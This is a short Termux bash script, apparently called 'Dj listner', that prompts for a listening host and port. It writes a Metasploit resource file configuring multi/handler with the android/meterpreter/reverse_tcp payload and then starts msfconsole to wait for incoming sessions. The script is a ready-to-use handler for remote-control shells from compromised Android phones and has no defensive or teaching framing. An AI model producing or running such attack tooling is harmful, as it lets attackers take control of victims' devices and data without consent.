#!/data/data/com.termux/files/usr/bin/bash
figlet Dj listner
rm -rf d.rc
echo "SET LHOST"
read lhost
echo "LPORT"
read lport
echo "use multi/handler" > d.rc
echo "set payload android/meterpreter/reverse_tcp" >> d.rc
echo "set lhost $lhost" >> d.rc
echo "set lport $lport" >> d.rc
echo "exploit" >> d.rc
msfconsole -r d.rc
